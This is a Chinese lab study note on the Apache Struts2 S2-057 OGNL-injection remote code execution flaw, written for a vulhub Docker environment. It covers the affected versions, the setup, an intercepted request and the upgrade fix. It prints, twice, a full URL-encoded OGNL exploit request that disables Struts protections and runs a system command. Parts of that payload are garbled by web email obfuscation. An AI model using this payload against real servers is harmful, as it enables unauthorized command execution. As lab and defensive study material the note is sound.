vulhub学习笔记-struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行

Struts2 S2-057 Remote Code Execution Vulnerablity远程代码执行

一．漏洞介绍
（一）编号
S2-057
（二）概述
S2-057漏洞产生于网站配置xml的时候，有一个namespace的值，该值并没有做详细的安全过滤导致可以写入到xml上，尤其url标签值也没有做通配符的过滤，导致可以执行远程代码以及系统命令到服务器系统中去
（三）影响版本
Apache Struts 2.3 – Struts 2.3.34
Apache Struts 2.5 – Struts 2.5.16
（四）适用条件
-alwaysSelectFullNamespace为true。
-action元素没有设置namespace属性，或者使用了通配符。
命名空间将由用户从uri传递并解析为OGNL表达式，最终导致远程代码执行漏洞。

二．操作步骤
（一）Vulhub ip地址：http://192.168.126.136
文件位于：/home/vulhub/vulhub-master/struts/S2-057
1.环境搭建 docker-compose build和docker-compose up -d
2.检查docker是否开启 docker-compose ps

（二）Windows
1.登录struts测试页面 http://192.168.126.136:8080/struts2-showcase

2.开启拦截抓包，点击view

3.发送到重发器，并修改get位置，再点go

Go得到下图所示结果，说明存在漏洞。可以看到，200*200的结果已经在Location头中返回。

4.修改数据包 数据包内容为

GET /struts2-showcase**/$%7B%0A%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%[email protected]@getRuntime%28%29.exec%28%27id%27%29%29.%[email protected]@toString%28%23a.getInputStream%28%29%29%29%7D/**actionChain1.action HTTP/1.1
Host: xx.xx.xx.xx:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: pma_lang=zh_CN; PHPSESSID=ktl19cua6l8te70hdre5vti097; security=low; JSESSIONID=8A451123FAEEC6210EA07D642B8D4778
Connection: close

/struts2-showcase*/$%7B%0A%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%[email protected]@getRuntime%28%29.exec%28%27id%27%29%29.%[email protected]@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action HTTP/1.1*

斜体为构造函数，粗体为执行命令
成功执行操作

三．漏洞防护
（一）尽快升级到Apache Struts 2.3.35 或 Struts 2.5.17版

参考文章 https://blog.csdn.net/lhh134/article/details/87368699
https://cloud.tencent.com/developer/article/1511916
https://www.jianshu.com/p/6db98793d043
https://blog.csdn.net/Z_Grant/article/details/101213506